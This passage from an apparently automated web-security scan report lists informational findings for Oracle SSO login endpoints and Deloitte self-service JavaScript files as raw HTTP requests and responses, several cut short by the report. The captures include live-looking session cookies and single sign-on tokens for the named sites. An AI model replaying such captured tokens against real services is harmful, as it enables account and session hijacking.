RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 7352
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBOd6uHK6EVADUS1EHWFB01t_bJ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

<!--
//global js var
var isNav;

// on load, run this
function doLoad() {

MM_reloadPage(true);
isNav = (navigator.appName.indexOf("Netscape") !=-1);

//register event listeners
...[SNIP]...

32.4. https://login.oracle.com/oam/server/sso/auth_cred_submit

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Request

POST /oam/server/sso/auth_cred_submit HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
Content-Length: 2316
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNt
Gu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

v=v1.4&request_id=-1117423317593169810&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQ
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:28 GMT
Set-Cookie: OAM_REQ=VERSION_4~8sDFSRHdibovgCmaA9kyeOsOvdSrurh9%2fYsDnUk2jlujlceQtRW%2fQNi%2flXtkj%2f1SgeTckB5GdKb4Hiz%2bcaNwewyERD7QcMRgfrRpVp90TY8%2bnYtDCyQML4cbcIJSBTocN%2bEcyowHjAV4T8IiI3ws7mDtrHQycjFS%2b95QII460g3qoNhW5NtfCCWtvEZPMmVBwHPgvUl5YR43OwJgq%2bgde0LQEam8lbD94jp4S6QIQXKKWPHI0shq11UCzQp5aTviul4GjqyWIuFn07nRX3c7G%2b8HAXNSYggrFqjg7N9UUmqwIfpGSKgxVQm2tlsyhx2lF5%2fX0znmI0CGPxx4YQVTl%2bytRrRVXkWsJKWAVC2FzkHt20rPSUn7Rzo%2bMTr39tUdbEwX6W8hNO2IrkJvXMMcG4bTMjA%2flK%2f4eDDKQ%2br%2f1adGjvQ2WW%2bXBGu1QE7ISAHAcp%2bIbTzC3qDrRlaOZfhk97Y08zoNSgWTBsG12KJsu03sFdYO857KTadQANWaeWqdu2Q2BUUGt%2fbNAg%2fENILYpeVU4d86XheiVhTMYekWWDmFlAWs0DYAM%2fCQK2ZXKVW7YTNKyMvHX1HQ2l4F5f%2bD6JGo%2f4Ry2rQnRq7GyVJ%2bzJQtF6jmJoT%2bzGRiv%2fNNNbbC31fjTRiLatV9yBVhBxppHWhW6bCA6QYsp5V74BcWmdtWQhbfiEnKZ3UmOb%2fCy1sG%2frCk%2fnPRs3cvRcBogNG7wow5PNoRfPVOUWXc7usXNYWVgHDEX%2fHWsui%2f4QTdBvYq%2ft2HetL6iIJD9WZ8jNh%2blmJa3smPgzYT9gacAilyIHHONowOlZ%2bcURiBuvAb7MvZxw9FgzeFFRCTo6x2xnhWElY4HbK7QFkICQ30JqYfGsrCQ8MDGbZGiAbZ46PvOXPiieaTuZc5UIc1bCKdSV1jOhoXiKS%2bwpAoSfC%2fe85ishtCItS6D9QwAU%2b6loe3DgvK4n71PHvaEEvoDHmJRu7cBud9m6v1ZVrhfxyTRXFlYRFNNuqkYAUxr7%2btX%2beHeWSxzLnrsRku1QxjbO9KosKHSaLFViJbMvbUqdCJO47kYlWlO1yUUjPaovy7hybBAbZv2lIBBYVBFi9AkrWVySFrl%2blnuYi%2f7VefR27D8%2fNlHuzS3d0uQp54NDsb3w0CM2d0ZEgF261aZjlrZDv7QPzW5%2fjv47uJUdUyzIIsrD%2fpO4WqefIJZkNbDUIiN4%2fU3MdciWfJk9ZyPeIuj4Z4SIQnGof8Zqf5FpE7YLidXdna2kuPrj9%2bWvOIEl0O6xE87fUHG83cMhqWltQTxdLcr7vm0KmM5n%2bc76Z0YYdmjqH48rlxK5HgZx%2bcLO0qjpOhfgGYsm%2blpKve%2bwUGhiGwuhvSfrI1RCpOeYzZT4Ow%2b7u5rIP2Z9n8CFs7YylZLN1thygm8RmyQw5PuTblocl9AFFvgH3MExec2L3WC0ymRApmsstEbF2Y%2bmnBtTbxMot3ZXMcfN9Aruj3T%2b%2b7D8u2Zv%2ffBdVt5qG3QItonF3FaFRiJ9QfIkvCT2vlYPQbI8jrJ5lqWqqYuyTS6DQdIJsSun1bXFZwksK9WdxHJGkOzAs3tM46h%2bhk9GQBqLceWigyZCuwHPI%2bHUUAq3a3j3jKLvi6eS5ZWrCxGXLqnsFSGQUWP7fElxGN35xwbvqMqetKjqX5VPTvDM4DINi0R1eoL5Xy8JofGj%2f1iEBuChkCDaSwb6sU%2b3ozVy4teWDpKd2ingo72r3r%2fM0rCvbbRfGlsN91sA%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXg116uHK6EVADUS1EHWFB01taYd
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/
Content-Length: 2359

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

32.5. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:13 GMT
Set-Cookie: OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d
; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXBDg6uHK6EVADUS1EHWFB01t_b1
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/
Content-Length: 3286

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

32.6. http://www.deloitte.com/deloitte-portal-selfservice/jquery.showLoading.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /deloitte-portal-selfservice/jquery.showLoading.js

Request

GET /deloitte-portal-selfservice/jquery.showLoading.js HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww64.deloitte.com=17297418.36895.0000; JSESSIONID=NBNNTmCLThd2pH5RTrs1PgpT2wzvNpyyvTdRJRh8xF2yGQdwy2K9!-647124463

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Accept-Ranges: bytes
Last-Modified: Fri, 04 Mar 2011 03:11:48 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Tue, 06 Sep 2011 15:56:57 GMT
Content-Length: 6553
Connection: close

/*
* jQuery showLoading plugin v1.0
*
* Copyright (c) 2009 Jim Keller
* Context - http://www.contextllc.com
*
* Dual licensed under the MIT and GPL licenses.
*
*/

jQuery.fn.showLo
...[SNIP]...

32.7. http://www.deloitte.com/deloitte-portal-selfservice/scripts/checkbox-style.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /deloitte-portal-selfservice/scripts/checkbox-style.js

Request

GET /deloitte-portal-selfservice/scripts/checkbox-style.js HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww64.deloitte.com=17297418.36895.0000; JSESSIONID=NBNNTmCLThd2pH5RTrs1PgpT2wzvNpyyvTdRJRh8xF2yGQdwy2K9!-647124463

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Accept-Ranges: bytes
Last-Modified: Fri, 04 Mar 2011 03:11:48 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 3789
Date: Tue, 06 Sep 2011 15:56:57 GMT
Connection: close

var imgUncheckedSrc = '/deloitte-ecm-cm-dpm-web/images/contentdisplay/checkbox_unchecked.png';
var imgDiabledSrc = '/deloitte-ecm-cm-dpm-web/images/contentdisplay/checkbox_disabled.gif';
var imgChec
...[SNIP]...

32.8. http://www.deloitte.com/deloitte-portal-selfservice/selfservice-api.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /deloitte-portal-selfservice/selfservice-api.js

Request

GET /deloitte-portal-selfservice/selfservice-api.js HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww64.deloitte.com=17297418.36895.0000; JSESSIONID=NBNNTmCLThd2pH5RTrs1PgpT2wzvNpyyvTdRJRh8xF2yGQdwy2K9!-647124463

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Accept-Ranges: bytes
Last-Modified: Thu, 28 Apr 2011 08:09:06 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 12899
Date: Tue, 06 Sep 2011 15:56:57 GMT
Connection: close

var myaccounturl= "";
var omnitureOut = "";

var closeModal = function() {
   $('#overlayMask').hide();
   $("#overlayRegion").hide();
   $("#overlayRegion").html("");
};


var openModal = functio
...[SNIP]...
